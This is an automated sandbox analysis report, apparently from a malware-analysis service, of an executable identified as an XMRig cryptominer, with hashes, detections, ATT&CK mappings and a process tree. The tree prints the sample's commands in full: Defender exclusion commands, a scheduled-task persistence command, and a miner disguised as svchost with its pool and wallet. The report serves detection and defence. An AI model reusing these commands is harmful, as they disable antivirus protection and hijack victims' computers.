xmrig | 98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

Analysis

max time kernel
1197s
max time network
1189s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
04/09/2024, 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

29.7MB
MD5

531a4e282c420c64d7b545a9c4e0fb4d
SHA1

998d298e9ff967bec6f03bf8e8e8f03b4b3728db
SHA256

98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c
SHA512

c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730
SSDEEP

786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv

Score

10^/10

xmrig execution miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral5/memory/1164-59-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-67-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-66-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-64-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-68-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-65-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-70-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-72-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-73-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-74-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-77-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-78-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-76-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-80-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral5/memory/1164-79-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3972	powershell.exe
2068	powershell.exe
3808	powershell.exe
3548	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5056	services64.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1172 set thread context of 1164	1172	conhost.exe	95

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5064	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2068	powershell.exe
2068	powershell.exe
3808	powershell.exe
3808	powershell.exe
3548	powershell.exe
3548	powershell.exe
3972	powershell.exe
3972	powershell.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe
1164	svchost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	1172	conhost.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeLockMemoryPrivilege	1164	svchost.exe
Token: SeLockMemoryPrivilege	1164	svchost.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 240 wrote to memory of 1924	240	test.exe	78
PID 240 wrote to memory of 1924	240	test.exe	78
PID 240 wrote to memory of 1924	240	test.exe	78
PID 1924 wrote to memory of 2588	1924	conhost.exe	79
PID 1924 wrote to memory of 2588	1924	conhost.exe	79
PID 1924 wrote to memory of 1980	1924	conhost.exe	80
PID 1924 wrote to memory of 1980	1924	conhost.exe	80
PID 1980 wrote to memory of 5064	1980	cmd.exe	83
PID 1980 wrote to memory of 5064	1980	cmd.exe	83
PID 2588 wrote to memory of 2068	2588	cmd.exe	84
PID 2588 wrote to memory of 2068	2588	cmd.exe	84
PID 2588 wrote to memory of 3808	2588	cmd.exe	85
PID 2588 wrote to memory of 3808	2588	cmd.exe	85
PID 1924 wrote to memory of 3752	1924	conhost.exe	86
PID 1924 wrote to memory of 3752	1924	conhost.exe	86
PID 3752 wrote to memory of 5056	3752	cmd.exe	88
PID 3752 wrote to memory of 5056	3752	cmd.exe	88
PID 5056 wrote to memory of 1172	5056	services64.exe	89
PID 5056 wrote to memory of 1172	5056	services64.exe	89
PID 5056 wrote to memory of 1172	5056	services64.exe	89
PID 1172 wrote to memory of 4540	1172	conhost.exe	90
PID 1172 wrote to memory of 4540	1172	conhost.exe	90
PID 4540 wrote to memory of 3548	4540	cmd.exe	92
PID 4540 wrote to memory of 3548	4540	cmd.exe	92
PID 4540 wrote to memory of 3972	4540	cmd.exe	94
PID 4540 wrote to memory of 3972	4540	cmd.exe	94
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95
PID 1172 wrote to memory of 1164	1172	conhost.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:240
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3808
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5064
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\system32\services64.exe
      C:\Windows\system32\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5056
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1172
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3972
      - C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
646B

MD5
77c55532f6106f9f01c86aac8ad7d486

SHA1
6083606a4db53d5b82f62441b749be6c7812d15a

SHA256
ffc096d92c2eaddfcfd323d54f3e1f6e916d05db3d0402ec28548cdf35ad6e8d

SHA512
dcb680b4205411eee8aadf3f9fbaf4aeea0e2a5216e4812abf96c9f71a19805088e5dd3adf784a66ad6ca0989279da405920e3c1e82b9fb4d12dae1762ebeb8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa6b748cd8f3e3c0e41549529b919e21

SHA1
5a4b9721f9fb5042f6ef7afd698d5ac5216a88bb

SHA256
d7d665a42f940443efb28eb231dfe1c4062394e71fba145d6eea9ec075b0f0e8

SHA512
361c523f49428a7e430279099e669a1a8af8764653f42e83105c0da3f8e8dd3be6c1719ea8c158d8f2e8425d74457147a4683190eb4a67019b9d02be44c13534

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sa2cxpxw.qtb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\services64.exe

Filesize
29.7MB

MD5
531a4e282c420c64d7b545a9c4e0fb4d

SHA1
998d298e9ff967bec6f03bf8e8e8f03b4b3728db

SHA256
98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

SHA512
c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730

Download Submit
memory/1164-62-0x0000020A51BB0000-0x0000020A51BD0000-memory.dmp

Filesize
128KB

Download
memory/1164-70-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-79-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-76-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-78-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-77-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-74-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-73-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-72-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-59-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-67-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-64-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-68-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1164-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1924-0-0x000001D06C7B0000-0x000001D06E566000-memory.dmp

Filesize
29.7MB

Download
memory/1924-1-0x00007FF96E0C3000-0x00007FF96E0C5000-memory.dmp

Filesize
8KB

Download
memory/1924-5-0x000001D071EF0000-0x000001D071EFA000-memory.dmp

Filesize
40KB

Download
memory/1924-2-0x00007FF96E0C0000-0x00007FF96EB82000-memory.dmp

Filesize
10.8MB

Download
memory/1924-3-0x000001D0747A0000-0x000001D076556000-memory.dmp

Filesize
29.7MB

Download
memory/1924-6-0x00007FF96E0C0000-0x00007FF96EB82000-memory.dmp

Filesize
10.8MB

Download
memory/1924-34-0x00007FF96E0C0000-0x00007FF96EB82000-memory.dmp

Filesize
10.8MB

Download
memory/1924-30-0x00007FF96E0C0000-0x00007FF96EB82000-memory.dmp

Filesize
10.8MB

Download
memory/1924-16-0x00007FF96E0C0000-0x00007FF96EB82000-memory.dmp

Filesize
10.8MB

Download
memory/1924-4-0x000001D071EC0000-0x000001D071ED2000-memory.dmp

Filesize
72KB

Download
memory/2068-15-0x000001EFE0D90000-0x000001EFE0DB2000-memory.dmp

Filesize
136KB

Download